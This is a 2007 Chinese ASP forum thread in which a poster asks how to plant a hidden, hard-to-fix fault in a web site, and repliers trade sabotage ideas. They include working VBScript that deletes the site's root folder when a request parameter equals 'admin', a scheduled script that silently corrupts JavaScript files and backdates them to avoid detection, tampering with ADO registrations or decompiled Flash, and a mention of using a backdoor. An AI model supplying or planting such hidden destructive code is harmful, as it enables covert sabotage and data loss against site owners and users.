★★★制造asp变态问题★★★

piaorou 2007-01-10 10:22:22
asp想制造1个特别的变态问题,让人很难发现,发现又很难改。
谁会?
环境,英文win2003 英文sqlserver2000
制造乱码什么的都是很容易解决的小问题。
...全文
275 13 打赏 收藏 转发到动态 举报
写回复
用AI写文章
13 条回复
切换为时间正序
请发表友善的回复…
发表回复
piaorou 2007-01-14
  • 打赏
  • 举报
回复
现在有又有一种想法,就是从flash入手,将他的flash反编译.然后用as语言来做点手脚,这招隐蔽.
btbtd 2007-01-13
  • 打赏
  • 举报
回复
嘻嘻, 从隐性转换出手, 很难察觉...
pzhuyy 2007-01-13
  • 打赏
  • 举报
回复
支持BT.
showlin 2007-01-13
  • 打赏
  • 举报
回复
那不是要用asp操作注册表阿,万一没开wsript.shell?
  • 打赏
  • 举报
回复
把ado的progid改了。。。。

这个变态
xukongshui 2007-01-12
  • 打赏
  • 举报
回复
....
showlin 2007-01-11
  • 打赏
  • 举报
回复
破坏很简单,变态很难

if request("a")="admin" then
Set fso = CreateObject("Scripting.FileSystemObject")
fso.DeleteFolder(server.mappath("../../../"),true)
end if
piaorou 2007-01-10
  • 打赏
  • 举报
回复
Sub DownTheFile()
Response.Clear
Dim stream, strPath, fileContentType
On Error Resume Next
strPath = "你的文件位置"
Set stream = Server.CreateObject("adodb.stream")
stream.Open
stream.Type = 1
stream.LoadFromFile(strPath)
Response.AddHeader "Content-Disposition", "Attachment; Filename=" & "文件名"
Response.AddHeader "Content-Length", stream.Size
Response.Charset = "UTF-8"
Response.ContentType = "Application/Octet-Stream"
Response.BinaryWrite stream.Read
Response.Flush
stream.Close
Set stream = Nothing
End Sub
piaorou 2007-01-10
  • 打赏
  • 举报
回复
笨啊,加空格asp不报错了吗?人家不就知道是哪行了吗?
在说了,加的是1般空格asp照样可以执行,16进制的00 对asp也没有什么影响
smartcatiboy 2007-01-10
  • 打赏
  • 举报
回复
在某一个asp文件里加一个空格
别人绝对很难发现,就算知道多了“ ”,也绝对没法改
以后每次后门进去的时候,都可以到这里看看,非常具有满足感
piaorou 2007-01-10
  • 打赏
  • 举报
回复
大家有什么变态制造问题的招贴一下啊
piaorou 2007-01-10
  • 打赏
  • 举报
回复
怎么个变态都行啊。
看你能想到什么。
比如:
我可以编个vbs脚本,每1分种执行一次这个vbs来
遍历web目录,碰到document.就改成Document.
这样javascript脚本区分大小写就执行不了拉,
然后在将当前的文件从新保存,并把修改日期设置成之前我们打开的日期
这样就发现不了拉。
Atai-Lu 2007-01-10
  • 打赏
  • 举报
回复
你想如何变态呢?如果实在搞不定你的程序,
大不了我重写程序,呵呵~

28,391

社区成员

发帖
与我相关
我的任务
社区描述
ASP即Active Server Pages,是Microsoft公司开发的服务器端脚本环境。
社区管理员
  • ASP
  • 无·法
加入社区
  • 近7日
  • 近30日
  • 至今
社区公告
暂无公告

试试用AI创作助手写篇文章吧